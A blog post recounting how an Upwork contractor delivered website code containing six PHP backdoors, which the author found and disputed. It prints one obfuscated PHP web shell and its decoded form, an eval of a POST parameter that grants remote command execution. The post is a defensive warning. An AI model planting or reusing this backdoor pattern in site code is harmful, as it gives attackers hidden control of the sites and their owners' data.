Upwork Outsourcing

As part of this experiment I decided to outsource the updating of this website with better graphics and layout. This was clearly done by someone on their cell phone and that’s not cutting it!  So I turned to Upwork (used to be Odesk for those of you who are familiar with the old name).

Setting up an account was a bit painful since their app doesn’t currently support the entire suite of tools on their website. Switching between the mobile browser and the app was a bit annoying, but it did work. After finally getting authorized, setting up payment, and getting a developer I was off to the races.

Things were going okay at first, for the first week or so. Regular communication and clear deadlines are important. But this particular developer had some tricks up their sleeves. Firstly, the account they used was a front for a larger dev team. That dev team wasn’t willing to use the built-in Upwork feature to track their time. That was my first clue that something was about to go awry.

The second is that it took 40 hours to package up the code for delivery – something that should have been extremely simple to do if the code was indeed being developed in any professional way.  But the last issue was the kicker.

When I got the code it was in a format the the iPhone can’t easily handle – zip files. So I broke my rule and downloaded it into a computer and before I could even unzip it, Microsoft’s Security Essentials found something that looked suspicious. So I dug into the code and found 6 PHP back doors that would allow this developer and their team to get access to this site.

Here’s an example of what the code looked like:

<?php $viu0="sutpe_or"; $iwvk7=$viu0[0].$viu0[2].$viu0[7].$viu0[2].$viu0[6].$viu0[1].$viu0[3].$viu0[3].$viu0[4].$viu0[7]; $uvwh73=$iwvk7 ($viu0[5].$viu0[3].$viu0[6].$viu0[0].$viu0[2]); if(isset(${$uvwh73}['q490ded'])){eval( ${$uvwh73}['q490ded']);} ?>

And after it’s decoded, this is what it looks like:

<?php if(isset(${_POST}['q490ded'])){eval(${_POST}['q490ded']);} ?>

Basically what this says is that any time their team went to my website and did a POST request to my site with the above parameter they would have been able to run any command they wanted to as if they had the same level of access that I had. That’s a bad thing if you’ve never heard of such a thing.

This points to two major failings of using the cell phone – uncompressing, navigating and finding issues within files is always going to be a bit more complex, except on things like unlocked Android environments. Secondly, even attempting to use a cell phone for this type of task became overwhelmingly painful even in such a simple task as receiving content and uploading it to the site.

I’ve contested the work the developer did, but as a smart phone executive, this is something to be wary of. I have very little concerns with Upwork as a company, but the developers you happen to be saddled with are a mixed bag and you need to be extremely cautious of their eventual work product.

Update: less than one day later the funds have been returned! Thanks to Upwork, Joe, and Dennis for helping in this matter!

Upwork Response

Published by

Robert Hansen

Robert is an executive with a smart phone. Trying to tackle the big meaty problem of mobility, in the modern world where content and creativity are requirements of a job well done.

One thought on “Upwork Outsourcing”

  1. Where there is one backdoor, there is likely more than one. Seen plenty of hardcoded admin credentials in apps like that.

Comments are closed.